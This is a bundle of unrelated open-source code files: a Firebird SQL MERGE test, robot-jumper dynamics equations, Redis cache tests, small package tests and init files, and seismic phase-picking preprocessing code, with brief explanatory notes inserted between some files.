when matched and s.id = 74 then update set t.x = t.x + s.x
when matched and s.id = 75 then update set t.x = t.x + s.x
when matched and s.id = 76 then update set t.x = t.x + s.x
when matched and s.id = 77 then update set t.x = t.x + s.x
when matched and s.id = 78 then update set t.x = t.x + s.x
when matched and s.id = 79 then update set t.x = t.x + s.x
when matched and s.id = 80 then update set t.x = t.x + s.x
when matched and s.id = 81 then update set t.x = t.x + s.x
when matched and s.id = 82 then update set t.x = t.x + s.x
when matched and s.id = 83 then update set t.x = t.x + s.x
when matched and s.id = 84 then update set t.x = t.x + s.x
when matched and s.id = 85 then update set t.x = t.x + s.x
when matched and s.id = 86 then update set t.x = t.x + s.x
when matched and s.id = 87 then update set t.x = t.x + s.x
when matched and s.id = 88 then update set t.x = t.x + s.x
when matched and s.id = 89 then update set t.x = t.x + s.x
when matched and s.id = 90 then update set t.x = t.x + s.x
when matched and s.id = 91 then update set t.x = t.x + s.x
when matched and s.id = 92 then update set t.x = t.x + s.x
when matched and s.id = 93 then update set t.x = t.x + s.x
when matched and s.id = 94 then update set t.x = t.x + s.x
when matched and s.id = 95 then update set t.x = t.x + s.x
when matched and s.id = 96 then update set t.x = t.x + s.x
when matched and s.id = 97 then update set t.x = t.x + s.x
when matched and s.id = 98 then update set t.x = t.x + s.x
when matched and s.id = 99 then update set t.x = t.x + s.x
when matched and s.id = 100 then update set t.x = t.x + s.x
when matched and s.id = 101 then update set t.x = t.x + s.x
when matched and s.id = 102 then update set t.x = t.x + s.x
when matched and s.id = 103 then update set t.x = t.x + s.x
when matched and s.id = 104 then update set t.x = t.x + s.x
when matched and s.id = 105 then update set t.x = t.x + s.x
when matched and s.id = 106 then update set t.x = t.x + s.x
when matched and s.id = 107 then update set t.x = t.x + s.x
when matched and s.id = 108 then update set t.x = t.x + s.x
when matched and s.id = 109 then update set t.x = t.x + s.x
when matched and s.id = 110 then update set t.x = t.x + s.x
when matched and s.id = 111 then update set t.x = t.x + s.x
when matched and s.id = 112 then update set t.x = t.x + s.x
when matched and s.id = 113 then update set t.x = t.x + s.x
when matched and s.id = 114 then update set t.x = t.x + s.x
when matched and s.id = 115 then update set t.x = t.x + s.x
when matched and s.id = 116 then update set t.x = t.x + s.x
when matched and s.id = 117 then update set t.x = t.x + s.x
when matched and s.id = 118 then update set t.x = t.x + s.x
when matched and s.id = 119 then update set t.x = t.x + s.x
when matched and s.id = 120 then update set t.x = t.x + s.x
when matched and s.id = 121 then update set t.x = t.x + s.x
when matched and s.id = 122 then update set t.x = t.x + s.x
when matched and s.id = 123 then update set t.x = t.x + s.x
when matched and s.id = 124 then update set t.x = t.x + s.x
when matched and s.id = 125 then update set t.x = t.x + s.x
when matched and s.id = 126 then update set t.x = t.x + s.x
when matched and s.id = 127 then update set t.x = t.x + s.x
when matched and s.id = 128 then update set t.x = t.x + s.x
when matched and s.id = 129 then update set t.x = t.x + s.x
when matched and s.id = 130 then update set t.x = t.x + s.x
when matched and s.id = 131 then update set t.x = t.x + s.x
when matched and s.id = 132 then update set t.x = t.x + s.x
when matched and s.id = 133 then update set t.x = t.x + s.x
when matched and s.id = 134 then update set t.x = t.x + s.x
when matched and s.id = 135 then update set t.x = t.x + s.x
when matched and s.id = 136 then update set t.x = t.x + s.x
when matched and s.id = 137 then update set t.x = t.x + s.x
when matched and s.id = 138 then update set t.x = t.x + s.x
when matched and s.id = 139 then update set t.x = t.x + s.x
when matched and s.id = 140 then update set t.x = t.x + s.x
when matched and s.id = 141 then update set t.x = t.x + s.x
when matched and s.id = 142 then update set t.x = t.x + s.x
when matched and s.id = 143 then update set t.x = t.x + s.x
when matched and s.id = 144 then update set t.x = t.x + s.x
when matched and s.id = 145 then update set t.x = t.x + s.x
when matched and s.id = 146 then update set t.x = t.x + s.x
when matched and s.id = 147 then update set t.x = t.x + s.x
when matched and s.id = 148 then update set t.x = t.x + s.x
when matched and s.id = 149 then update set t.x = t.x + s.x
when matched and s.id = 150 then update set t.x = t.x + s.x
when matched and s.id = 151 then update set t.x = t.x + s.x
when matched and s.id = 152 then update set t.x = t.x + s.x
when matched and s.id = 153 then update set t.x = t.x + s.x
when matched and s.id = 154 then update set t.x = t.x + s.x
when matched and s.id = 155 then update set t.x = t.x + s.x
when matched and s.id = 156 then update set t.x = t.x + s.x
when matched and s.id = 157 then update set t.x = t.x + s.x
when matched and s.id = 158 then update set t.x = t.x + s.x
when matched and s.id = 159 then update set t.x = t.x + s.x
when matched and s.id = 160 then update set t.x = t.x + s.x
when matched and s.id = 161 then update set t.x = t.x + s.x
when matched and s.id = 162 then update set t.x = t.x + s.x
when matched and s.id = 163 then update set t.x = t.x + s.x
when matched and s.id = 164 then update set t.x = t.x + s.x
when matched and s.id = 165 then update set t.x = t.x + s.x
when matched and s.id = 166 then update set t.x = t.x + s.x
when matched and s.id = 167 then update set t.x = t.x + s.x
when matched and s.id = 168 then update set t.x = t.x + s.x
when matched and s.id = 169 then update set t.x = t.x + s.x
when matched and s.id = 170 then update set t.x = t.x + s.x
when matched and s.id = 171 then update set t.x = t.x + s.x
when matched and s.id = 172 then update set t.x = t.x + s.x
when matched and s.id = 173 then update set t.x = t.x + s.x
when matched and s.id = 174 then update set t.x = t.x + s.x
when matched and s.id = 175 then update set t.x = t.x + s.x
when matched and s.id = 176 then update set t.x = t.x + s.x
when matched and s.id = 177 then update set t.x = t.x + s.x
when matched and s.id = 178 then update set t.x = t.x + s.x
when matched and s.id = 179 then update set t.x = t.x + s.x
when matched and s.id = 180 then update set t.x = t.x + s.x
when matched and s.id = 181 then update set t.x = t.x + s.x
when matched and s.id = 182 then update set t.x = t.x + s.x
when matched and s.id = 183 then update set t.x = t.x + s.x
when matched and s.id = 184 then update set t.x = t.x + s.x
when matched and s.id = 185 then update set t.x = t.x + s.x
when matched and s.id = 186 then update set t.x = t.x + s.x
when matched and s.id = 187 then update set t.x = t.x + s.x
when matched and s.id = 188 then update set t.x = t.x + s.x
when matched and s.id = 189 then update set t.x = t.x + s.x
when matched and s.id = 190 then update set t.x = t.x + s.x
when matched and s.id = 191 then update set t.x = t.x + s.x
when matched and s.id = 192 then update set t.x = t.x + s.x
when matched and s.id = 193 then update set t.x = t.x + s.x
when matched and s.id = 194 then update set t.x = t.x + s.x
when matched and s.id = 195 then update set t.x = t.x + s.x
when matched and s.id = 196 then update set t.x = t.x + s.x
when matched and s.id = 197 then update set t.x = t.x + s.x
when matched and s.id = 198 then update set t.x = t.x + s.x
when matched and s.id = 199 then update set t.x = t.x + s.x
when matched and s.id = 200 then update set t.x = t.x + s.x
when matched and s.id = 201 then update set t.x = t.x + s.x
when matched and s.id = 202 then update set t.x = t.x + s.x
when matched and s.id = 203 then update set t.x = t.x + s.x
when matched and s.id = 204 then update set t.x = t.x + s.x
when matched and s.id = 205 then update set t.x = t.x + s.x
when matched and s.id = 206 then update set t.x = t.x + s.x
when matched and s.id = 207 then update set t.x = t.x + s.x
when matched and s.id = 208 then update set t.x = t.x + s.x
when matched and s.id = 209 then update set t.x = t.x + s.x
when matched and s.id = 210 then update set t.x = t.x + s.x
when matched and s.id = 211 then update set t.x = t.x + s.x
when matched and s.id = 212 then update set t.x = t.x + s.x
when matched and s.id = 213 then update set t.x = t.x + s.x
when matched and s.id = 214 then update set t.x = t.x + s.x
when matched and s.id = 215 then update set t.x = t.x + s.x
when matched and s.id = 216 then update set t.x = t.x + s.x
when matched and s.id = 217 then update set t.x = t.x + s.x
when matched and s.id = 218 then update set t.x = t.x + s.x
when matched and s.id = 219 then update set t.x = t.x + s.x
when matched and s.id = 220 then update set t.x = t.x + s.x
when matched and s.id = 221 then update set t.x = t.x + s.x
when matched and s.id = 222 then update set t.x = t.x + s.x
when matched and s.id = 223 then update set t.x = t.x + s.x
when matched and s.id = 224 then update set t.x = t.x + s.x
when matched and s.id = 225 then update set t.x = t.x + s.x
when matched and s.id = 226 then update set t.x = t.x + s.x
when matched and s.id = 227 then update set t.x = t.x + s.x
when matched and s.id = 228 then update set t.x = t.x + s.x
when matched and s.id = 229 then update set t.x = t.x + s.x
when matched and s.id = 230 then update set t.x = t.x + s.x
when matched and s.id = 231 then update set t.x = t.x + s.x
when matched and s.id = 232 then update set t.x = t.x + s.x
when matched and s.id = 233 then update set t.x = t.x + s.x
when matched and s.id = 234 then update set t.x = t.x + s.x
when matched and s.id = 235 then update set t.x = t.x + s.x
when matched and s.id = 236 then update set t.x = t.x + s.x
when matched and s.id = 237 then update set t.x = t.x + s.x
when matched and s.id = 238 then update set t.x = t.x + s.x
when matched and s.id = 239 then update set t.x = t.x + s.x
when matched and s.id = 240 then update set t.x = t.x + s.x
when matched and s.id = 241 then update set t.x = t.x + s.x
when matched and s.id = 242 then update set t.x = t.x + s.x
when matched and s.id = 243 then update set t.x = t.x + s.x
when matched and s.id = 244 then update set t.x = t.x + s.x
when matched and s.id = 245 then update set t.x = t.x + s.x
when matched and s.id = 246 then update set t.x = t.x + s.x
when matched and s.id = 247 then update set t.x = t.x + s.x
when matched and s.id = 248 then update set t.x = t.x + s.x
when matched and s.id = 249 then update set t.x = t.x + s.x
when matched and s.id = 250 then update set t.x = t.x + s.x
when matched and s.id = 251 then update set t.x = t.x + s.x
when matched and s.id = 252 then update set t.x = t.x + s.x
when matched and s.id = 253 then update set t.x = t.x + s.x
when matched and s.id = 254 then update set t.x = t.x + s.x
;
rollback;
set count on;
select * from t;
set count off;
-- 2. Check correctness of results:
select * from tb;
merge into tb t
using ta s
on s.id = t.id
when matched and t.id < 2 then delete
when matched then update set t.x = t.x + s.x, t.y = t.y - s.y
when not matched and s.x < 250 then insert values(-s.id, s.x, s.y)
when not matched then insert values(s.id, s.x, s.y)
;
select * from tb;
rollback;
"""
act_1 = isql_act('db_1', test_script_1, substitutions=substitutions_1)
expected_stdout_1 = """
Records affected: 0
ID X Y
============ ============ ============
1 10 11
4 40 44
5 50 55
ID X Y
============ ============ ============
4 440 -400
5 550 -500
-2 200 222
3 300 333
"""
@pytest.mark.version('>=3.0')
def test_1(act_1: Action):
    act_1.expected_stdout = expected_stdout_1
    act_1.execute()
    assert act_1.clean_expected_stdout == act_1.clean_stdout
# ---- a_s.py (tsybulkin/jumper, BSD-2-Clause) ----
import numpy as np
from numpy import sin, cos
from params import *
def get_c1(q, q_d, psi=0):
    _, _, a, b, g = q
    _, _, a_d, b_d, g_d = q_d
    return np.array([
        I1 + 2*L1**2*m1*sin(a + b + g)**2,
        2*L1**2*m1*sin(a + b + g)**2
        + L1*L2*m1*sin(b + g)*sin(a + b + g)
        - L1*L2*m1*sin(a + b + g)*cos(b + g)
        + L1*L3*m1*sin(a + b + g)*sin(b)
        - L1*L3*m1*sin(a + b + g)*cos(b),
        2*L1**2*m1*sin(a + b + g)**2
        + L1*L2*m1*sin(b + g)*sin(a + b + g)
        - L1*L2*m1*sin(a + b + g)*cos(b + g)
    ])
def get_d1(q, q_d, psi=0):
    _, _, a, b, g = q
    _, _, a_d, b_d, g_d = q_d
    return L1**2*m1*sin(2*a + 2*b + 2*g)*a_d**2 \
        + 2*L1**2*m1*sin(2*a + 2*b + 2*g)*a_d*b_d \
        + 2*L1**2*m1*sin(2*a + 2*b + 2*g)*a_d*g_d \
        + L1**2*m1*sin(2*a + 2*b + 2*g)*b_d**2 \
        + 2*L1**2*m1*sin(2*a + 2*b + 2*g)*b_d*g_d \
        + L1**2*m1*sin(2*a + 2*b + 2*g)*g_d**2 \
        + L1*L2*m1*sin(b + g)*sin(a + b + g)*b_d**2 \
        + 2*L1*L2*m1*sin(b + g)*sin(a + b + g)*b_d*g_d \
        + L1*L2*m1*sin(b + g)*sin(a + b + g)*g_d**2 \
        + L1*L2*m1*sin(a + b + g)*cos(b + g)*b_d**2 \
        + 2*L1*L2*m1*sin(a + b + g)*cos(b + g)*b_d*g_d \
        + L1*L2*m1*sin(a + b + g)*cos(b + g)*g_d**2 \
        + L1*L3*m1*sin(a + b + g)*sin(b)*b_d**2 \
        + L1*L3*m1*sin(a + b + g)*cos(b)*b_d**2 \
        - L1*Grav*m1*sin(a + b + g) \
        + dz*k1*z1*sin(a) - dz*k2*z2*sin(a) \
        + k1*z0*z1*sin(psi)*sin(a) - k1*z1**2*sin(2*a)/2 \
        + k2*z0*z2*sin(psi)*sin(a) - k2*z2**2*sin(2*a)/2 \
        + miu_a*a_d
# ---- tests/client/test_cache.py (eoghanmurray/aredis, MIT) ----
#!/usr/bin/python
# -*- coding: utf-8 -*-
import asyncio
import pytest
import time
from aredis.cache import Cache, HerdCache
class TestCache(object):
    app = 'test_cache'
    key = 'test_key'
    data = {str(i): i for i in range(3)}

    def expensive_work(self, data):
        return data

    @pytest.mark.asyncio(forbid_global_loop=True)
    async def test_set(self, r):
        await r.flushdb()
        cache = Cache(r, self.app)
        res = await cache.set(self.key,
                              self.expensive_work(self.data),
                              self.data)
        assert res
        identity = cache._gen_identity(self.key, self.data)
        content = await r.get(identity)
        content = cache._unpack(content)
        assert content == self.data

    @pytest.mark.asyncio(forbid_global_loop=True)
    async def test_set_timeout(self, r, event_loop):
        await r.flushdb()
        cache = Cache(r, self.app)
        res = await cache.set(self.key,
                              self.expensive_work(self.data),
                              self.data, expire_time=1)
        assert res
        identity = cache._gen_identity(self.key, self.data)
        content = await r.get(identity)
        content = cache._unpack(content)
        assert content == self.data
        await asyncio.sleep(1, loop=event_loop)
        content = await r.get(identity)
        assert content is None

    @pytest.mark.asyncio(forbid_global_loop=True)
    async def test_set_with_plain_key(self, r):
        await r.flushdb()
        cache = Cache(r, self.app, identity_generator_class=None)
        res = await cache.set(self.key,
                              self.expensive_work(self.data),
                              self.data, expire_time=1)
        assert res
        identity = cache._gen_identity(self.key, self.data)
        assert identity == self.key
        content = await r.get(identity)
        content = cache._unpack(content)
        assert content == self.data

    @pytest.mark.asyncio(forbid_global_loop=True)
    async def test_get(self, r):
        await r.flushdb()
        cache = Cache(r, self.app)
        res = await cache.set(self.key,
                              self.expensive_work(self.data),
                              self.data, expire_time=1)
        assert res
        content = await cache.get(self.key, self.data)
        assert content == self.data

    @pytest.mark.asyncio(forbid_global_loop=True)
    async def test_set_many(self, r):
        await r.flushdb()
        cache = Cache(r, self.app)
        res = await cache.set_many(self.expensive_work(self.data),
                                   self.data)
        assert res
        for key, value in self.data.items():
            assert await cache.get(key, self.data) == value

    @pytest.mark.asyncio(forbid_global_loop=True)
    async def test_delete(self, r):
        await r.flushdb()
        cache = Cache(r, self.app)
        res = await cache.set(self.key,
                              self.expensive_work(self.data),
                              self.data, expire_time=1)
        assert res
        content = await cache.get(self.key, self.data)
        assert content == self.data
        res = await cache.delete(self.key, self.data)
        assert res
        content = await cache.get(self.key, self.data)
        assert content is None

    @pytest.mark.asyncio(forbid_global_loop=True)
    async def test_delete_pattern(self, r):
        await r.flushdb()
        cache = Cache(r, self.app)
        await cache.set_many(self.expensive_work(self.data),
                             self.data)
        res = await cache.delete_pattern('test_*', 10)
        assert res == 3
        content = await cache.get(self.key, self.data)
        assert content is None

    @pytest.mark.asyncio(forbid_global_loop=True)
    async def test_ttl(self, r, event_loop):
        await r.flushdb()
        cache = Cache(r, self.app)
        await cache.set(self.key, self.expensive_work(self.data),
                        self.data, expire_time=1)
        ttl = await cache.ttl(self.key, self.data)
        assert ttl > 0
        await asyncio.sleep(1.1, loop=event_loop)
        ttl = await cache.ttl(self.key, self.data)
        assert ttl < 0

    @pytest.mark.asyncio(forbid_global_loop=True)
    async def test_exists(self, r, event_loop):
        await r.flushdb()
        cache = Cache(r, self.app)
        await cache.set(self.key, self.expensive_work(self.data),
                        self.data, expire_time=1)
        exists = await cache.exist(self.key, self.data)
        assert exists is True
        await asyncio.sleep(1.1, loop=event_loop)
        exists = await cache.exist(self.key, self.data)
        assert exists is False
class TestHerdCache(object):
    app = 'test_cache'
    key = 'test_key'
    data = {str(i): i for i in range(3)}

    def expensive_work(self, data):
        return data

    @pytest.mark.asyncio(forbid_global_loop=True)
    async def test_set(self, r):
        await r.flushdb()
        cache = HerdCache(r, self.app, default_herd_timeout=1,
                          extend_herd_timeout=1)
        now = int(time.time())
        res = await cache.set(self.key,
                              self.expensive_work(self.data),
                              self.data)
        assert res
        identity = cache._gen_identity(self.key, self.data)
        content = await r.get(identity)
        content, expect_expire_time = cache._unpack(content)
        # supposed to equal 1, but there may be latency
        assert expect_expire_time - now <= 1
        assert content == self.data

    @pytest.mark.asyncio(forbid_global_loop=True)
    async def test_get(self, r):
        await r.flushdb()
        cache = HerdCache(r, self.app, default_herd_timeout=1,
                          extend_herd_timeout=1)
        res = await cache.set(self.key,
                              self.expensive_work(self.data),
                              self.data)
        assert res
        content = await cache.get(self.key, self.data)
        assert content == self.data

    @pytest.mark.asyncio(forbid_global_loop=True)
    async def test_set_many(self, r):
        await r.flushdb()
        cache = HerdCache(r, self.app, default_herd_timeout=1,
                          extend_herd_timeout=1)
        res = await cache.set_many(self.expensive_work(self.data),
                                   self.data)
        assert res
        for key, value in self.data.items():
            assert await cache.get(key, self.data) == value

    @pytest.mark.asyncio(forbid_global_loop=True)
    async def test_herd(self, r, event_loop):
        await r.flushdb()
        now = int(time.time())
        cache = HerdCache(r, self.app, default_herd_timeout=1,
                          extend_herd_timeout=1)
        await cache.set(self.key,
                        self.expensive_work(self.data),
                        self.data)
        await asyncio.sleep(1, loop=event_loop)
        # first get
        identity = cache._gen_identity(self.key, self.data)
        content = await r.get(identity)
        content, expect_expire_time = cache._unpack(content)
        assert now + 1 == expect_expire_time
        # HerdCache.get
        await asyncio.sleep(0.1, loop=event_loop)
        res = await cache.get(self.key, self.data)
        # the first herd get will reset the expire time and return None
        assert res is None
        # second get
        identity = cache._gen_identity(self.key, self.data)
        content = await r.get(identity)
        content, new_expire_time = cache._unpack(content)
        assert new_expire_time >= expect_expire_time + 1
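The tests above repeatedly call `cache._gen_identity(key, param)` and expect that the same `(key, param)` pair always maps to the same Redis key (and that with `identity_generator_class=None` the plain key is used). A simplified, hypothetical sketch of that idea follows; it is not aredis's actual implementation, and `gen_identity` and its format string are made up for illustration:

```python
import hashlib
import pickle

def gen_identity(app, key, param=None):
    # Hash the call parameters so the same (key, param) pair always
    # maps to the same cache entry; fall back to the plain key when
    # no parameters are given (mimicking identity_generator_class=None).
    if param is None:
        return key
    digest = hashlib.md5(pickle.dumps(param)).hexdigest()
    return '{}:{}:{}'.format(app, key, digest)

ident = gen_identity('test_cache', 'test_key', {'0': 0, '1': 1, '2': 2})
```

The key property the tests rely on is determinism: calling the generator twice with equal arguments yields the identical Redis key.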
# ---- tests/test_resources.py (akhoubani/snek5000, BSD-3-Clause) ----
import snek5000
def test_nek5000():
    assert snek5000.source_root()


def test_asset():
    assert snek5000.get_asset("nek5000.smk")
    assert snek5000.get_asset("default_configfile.yml")
# ---- entsoe_client/Queries/__init__.py (DarioHett/entsoe-client, MIT) ----
from entsoe_client.Queries.Query import Query
import entsoe_client.Queries.Load
import entsoe_client.Queries.Transmission
import entsoe_client.Queries.Congestion
import entsoe_client.Queries.MasterData
import entsoe_client.Queries.Generation
import entsoe_client.Queries.Balancing
import entsoe_client.Queries.Outages
# ---- src/S_EqT_codes/src/data_preprocessing.py (MrXiaoXiao/ESPRH, MIT) ----
import numpy as np
import os
def build_phase_dict_from_EqT(cfgs, wavetype='P'):
    station_list = list()
    phase_dict = dict()
    station_list_file = open(cfgs['REAL']['save_sta'], 'r')
    sta_id = 0
    for line in station_list_file.readlines():
        if len(line) < 3:
            continue
        splits = line.split(' ')
        sta_name = splits[2] + '.' + splits[3]
        phase_dict[sta_name] = dict()
        phase_dict[sta_name]['P'] = list()
        phase_dict[sta_name]['S'] = list()
        phase_dict[sta_name]['P_Prob'] = list()
        phase_dict[sta_name]['S_Prob'] = list()
        sta_lat = float(splits[1])
        sta_lon = float(splits[0])
        station_list.append((sta_id, sta_name, sta_lat, sta_lon))
        sta_id += 1
    for sta_key in phase_dict.keys():
        pick_times = list()
        pick_probs = list()
        prev_file = cfgs['EqT']['txt_folder'] + '{}.{}.txt'.format(sta_key, wavetype)
        if os.path.exists(prev_file):
            f = open(prev_file, 'r')
            for line in f.readlines():
                if len(line) > 3:
                    pick_times.append(float(line.split(' ')[0]))
                    pick_probs.append(float(line.split(' ')[1]))
            f.close()
        else:
            print('Empty ' + prev_file)
        phase_dict[sta_key]['{}'.format(wavetype)] = pick_times
        phase_dict[sta_key]['{}_Prob'.format(wavetype)] = pick_probs
    return phase_dict, station_list
def build_phase_dict(sta_file_name, res_folder_name, wavetype='P'):
    station_list = list()
    phase_dict = dict()
    station_list_file = open(sta_file_name, 'r')
    sta_id = 0
    for line in station_list_file.readlines():
        if len(line) < 3:
            continue
        splits = line.split(' ')
        sta_name = splits[2] + '.' + splits[3]
        phase_dict[sta_name] = dict()
        phase_dict[sta_name]['P'] = list()
        phase_dict[sta_name]['S'] = list()
        phase_dict[sta_name]['P_amp'] = list()
        phase_dict[sta_name]['P_Prob'] = list()
        phase_dict[sta_name]['S_amp'] = list()
        phase_dict[sta_name]['S_Prob'] = list()
        sta_lat = float(splits[1])
        sta_lon = float(splits[0])
        station_list.append((sta_id, sta_name, sta_lat, sta_lon))
        sta_id += 1
    for sta_key in phase_dict.keys():
        pick_times = list()
        pick_probs = list()
        prev_file = res_folder_name + '/' + '{}.{}.txt'.format(sta_key, wavetype)
        if os.path.exists(prev_file):
            f = open(prev_file, 'r')
            for line in f.readlines():
                if len(line) > 3:
                    pick_times.append(float(line.split(' ')[0]))
                    pick_probs.append(float(line.split(' ')[1]))
            f.close()
        else:
            print('Missing ' + prev_file)
        phase_dict[sta_key]['{}'.format(wavetype)] = pick_times
        phase_dict[sta_key]['{}_Prob'.format(wavetype)] = pick_probs
    return phase_dict, station_list
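Both builders above assume space-separated station lines of the form `lon lat network station ...` (a REAL-style station list). A minimal standalone sketch of that per-line logic, with a made-up example line:

```python
def parse_station_line(line, sta_id):
    # Mirrors the splitting logic above: columns are
    # longitude, latitude, network code, station code.
    splits = line.split(' ')
    sta_name = splits[2] + '.' + splits[3]
    sta_lat = float(splits[1])
    sta_lon = float(splits[0])
    return (sta_id, sta_name, sta_lat, sta_lon)

entry = parse_station_line('-117.5 35.7 CI WBS', 0)
```

Note that, like the original, this splits on single spaces only; tab-separated or multi-space files would need `line.split()` instead.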
def normalize_by_std(data_in):
    """
    Standard-deviation normalization: demean each channel, then divide
    by its standard deviation (channels with zero std are left unscaled
    to avoid division by zero).
    """
    data_in -= np.mean(data_in, axis=0, keepdims=True)
    t_std = np.std(data_in, axis=0, keepdims=True)
    t_std[t_std == 0] = 1.0
    data_in /= t_std
    return data_in
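A quick illustration of the normalization (the function is repeated here so the snippet is self-contained; the `(samples, channels)` array shape is an assumption based on `axis=0`):

```python
import numpy as np

def normalize_by_std(data_in):
    # demean each column, then scale by its std (guarding zero-std columns)
    data_in -= np.mean(data_in, axis=0, keepdims=True)
    t_std = np.std(data_in, axis=0, keepdims=True)
    t_std[t_std == 0] = 1.0
    data_in /= t_std
    return data_in

# column 0 varies, column 1 is constant (zero std)
x = np.array([[1.0, 5.0], [3.0, 5.0], [5.0, 5.0]])
out = normalize_by_std(x)
# column 0 -> zero mean, unit std; column 1 -> all zeros
```

Note that the function mutates its argument in place (via `-=` and `/=`) as well as returning it, so callers should pass a copy if the original array must be preserved.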
def get_response_list_for_vis(cfgs, spt_t_eqt, sst_t_eqt, encoded_t, encoded_s):
    RSRN_lengths = cfgs['Model']['RSRN_Encoded_lengths']
    RSRN_channels = cfgs['Model']['RSRN_Encoded_channels']
    # encoder_encoded_list = cfgs['Model']['Encoder_concate_list']
    # encoder_encoded_lengths = cfgs['Model']['Encoder_concate_lengths']
    # encoder_encoded_channels = cfgs['Model']['Encoder_concate_channels']
    ori_response_list_for_vis = list()
    enhanced_response_list_for_vis = list()
    t_spt_t = float(spt_t_eqt/6000.0)
    t_sst_t = float(sst_t_eqt/6000.0)
    for rdx in range(len(RSRN_lengths)):
        temp_length = float(RSRN_lengths[rdx])
        template_s = int(t_spt_t*temp_length) - 1
        template_e = int(t_sst_t*temp_length) + 1
        template_w = int(template_e - template_s)
        encoded_t[rdx] = encoded_t[rdx][:, template_s:template_e, :]/float(template_w)
        encoded_t[rdx] = encoded_t[rdx].reshape([1, template_w, 1, int(RSRN_channels[rdx])])
        encoded_s[rdx] = encoded_s[rdx].reshape([1, int(RSRN_lengths[rdx]), 1, int(RSRN_channels[rdx])])
        ori_response_list_for_vis.append(np.copy(encoded_t[rdx]))
        ori_response_list_for_vis.append(np.copy(encoded_s[rdx]))
        # channel-wise normalization
        for channel_dx in range(int(RSRN_channels[rdx])):
            encoded_s[rdx][0, :, 0, channel_dx] -= np.max(encoded_s[rdx][0, :, 0, channel_dx])
            half_window_len = int(200.0*temp_length/6000.0) + 1
            encoded_s[rdx][0, :half_window_len, 0, channel_dx] = encoded_s[rdx][0, half_window_len, 0, channel_dx]
            encoded_s[rdx][0, -half_window_len:, 0, channel_dx] = encoded_s[rdx][0, -half_window_len, 0, channel_dx]
            encoded_s[rdx][0, :, 0, channel_dx] *= -1.0
            encoded_s[rdx][0, :, 0, channel_dx] -= np.mean(encoded_s[rdx][0, :, 0, channel_dx])
            t_max = np.max(np.abs(encoded_s[rdx][0, :, 0, channel_dx]))
            if t_max < 0.001:
                t_max = 1
            encoded_s[rdx][0, :, 0, channel_dx] /= t_max
            encoded_t[rdx][0, :, 0, channel_dx] -= np.max(encoded_t[rdx][0, :, 0, channel_dx])
            encoded_t[rdx][0, :, 0, channel_dx] *= -1.0
            encoded_t[rdx][0, :, 0, channel_dx] -= np.mean(encoded_t[rdx][0, :, 0, channel_dx])
            t_max = np.max(np.abs(encoded_t[rdx][0, :, 0, channel_dx]))
            if t_max < 0.001:
                t_max = 1
            encoded_t[rdx][0, :, 0, channel_dx] /= t_max
            encoded_t[rdx][0, :, 0, channel_dx] /= float(template_w)
        enhanced_response_list_for_vis.append(encoded_t[rdx])
        enhanced_response_list_for_vis.append(encoded_s[rdx])
    return ori_response_list_for_vis, enhanced_response_list_for_vis
def get_siamese_input_list(cfgs, spt_t_eqt, sst_t_eqt, encoded_t, encoded_s):
    RSRN_lengths = cfgs['Model']['RSRN_Encoded_lengths']
    RSRN_channels = cfgs['Model']['RSRN_Encoded_channels']
    encoder_encoded_list = cfgs['Model']['Encoder_concate_list']
    encoder_encoded_lengths = cfgs['Model']['Encoder_concate_lengths']
    encoder_encoded_channels = cfgs['Model']['Encoder_concate_channels']
    siamese_input_list = list()
    t_spt_t = float(spt_t_eqt/6000.0)
    t_sst_t = float(sst_t_eqt/6000.0)
    for rdx in range(len(RSRN_lengths)):
        temp_length = float(RSRN_lengths[rdx])
        template_s = int(t_spt_t*temp_length) - 1
        template_e = int(t_sst_t*temp_length) + 1
        template_w = int(template_e - template_s)
        encoded_t[rdx] = encoded_t[rdx][:, template_s:template_e, :]/float(template_w)
        encoded_t[rdx] = encoded_t[rdx].reshape([1, template_w, 1, int(RSRN_channels[rdx])])
        encoded_s[rdx] = encoded_s[rdx].reshape([1, int(RSRN_lengths[rdx]), 1, int(RSRN_channels[rdx])])
        # channel-wise normalization
        for channel_dx in range(int(RSRN_channels[rdx])):
            encoded_s[rdx][0, :, 0, channel_dx] -= np.max(encoded_s[rdx][0, :, 0, channel_dx])
            half_window_len = int(200.0*temp_length/6000.0) + 1
            encoded_s[rdx][0, :half_window_len, 0, channel_dx] = encoded_s[rdx][0, half_window_len, 0, channel_dx]
            encoded_s[rdx][0, -half_window_len:, 0, channel_dx] = encoded_s[rdx][0, -half_window_len, 0, channel_dx]
            encoded_s[rdx][0, :, 0, channel_dx] *= -1.0
            encoded_s[rdx][0, :, 0, channel_dx] -= np.mean(encoded_s[rdx][0, :, 0, channel_dx])
            t_max = np.max(np.abs(encoded_s[rdx][0, :, 0, channel_dx]))
            if t_max < 0.001:
                t_max = 1
            encoded_s[rdx][0, :, 0, channel_dx] /= t_max
            encoded_t[rdx][0, :, 0, channel_dx] -= np.max(encoded_t[rdx][0, :, 0, channel_dx])
            encoded_t[rdx][0, :, 0, channel_dx] *= -1.0
            encoded_t[rdx][0, :, 0, channel_dx] -= np.mean(encoded_t[rdx][0, :, 0, channel_dx])
            t_max = np.max(np.abs(encoded_t[rdx][0, :, 0, channel_dx]))
            if t_max < 0.001:
                t_max = 1
            encoded_t[rdx][0, :, 0, channel_dx] /= t_max
            encoded_t[rdx][0, :, 0, channel_dx] /= float(template_w)
        siamese_input_list.append(encoded_t[rdx])
        siamese_input_list.append(encoded_s[rdx])
    for rdx in range(len(RSRN_lengths), len(RSRN_lengths) + len(encoder_encoded_list)):
        rdx_2 = rdx - len(RSRN_lengths)
        temp_length = float(encoder_encoded_lengths[rdx_2])
        template_s = int(t_spt_t*temp_length) - 1
        template_e = int(t_sst_t*temp_length) + 1
        template_w = int(template_e - template_s)
        encoded_t[rdx] = encoded_t[rdx][:, template_s:template_e, :]/float(template_w)
        encoded_t[rdx] = encoded_t[rdx].reshape([1, template_w, 1, int(encoder_encoded_channels[rdx_2])])
        encoded_s[rdx] = encoded_s[rdx].reshape([1, int(encoder_encoded_lengths[rdx_2]), 1, int(encoder_encoded_channels[rdx_2])])
        # channel normalization
        for channel_dx in range(int(encoder_encoded_channels[rdx_2])):
            encoded_s[rdx][0, :, 0, channel_dx] -= np.max(encoded_s[rdx][0, :, 0, channel_dx])
            half_window_len = int(200.0*temp_length/6000.0) + 1
            encoded_s[rdx][0, :half_window_len, 0, channel_dx] = encoded_s[rdx][0, half_window_len, 0, channel_dx]
            encoded_s[rdx][0, -half_window_len:, 0, channel_dx] = encoded_s[rdx][0, -half_window_len, 0, channel_dx]
            encoded_s[rdx][0, :, 0, channel_dx] *= -1.0
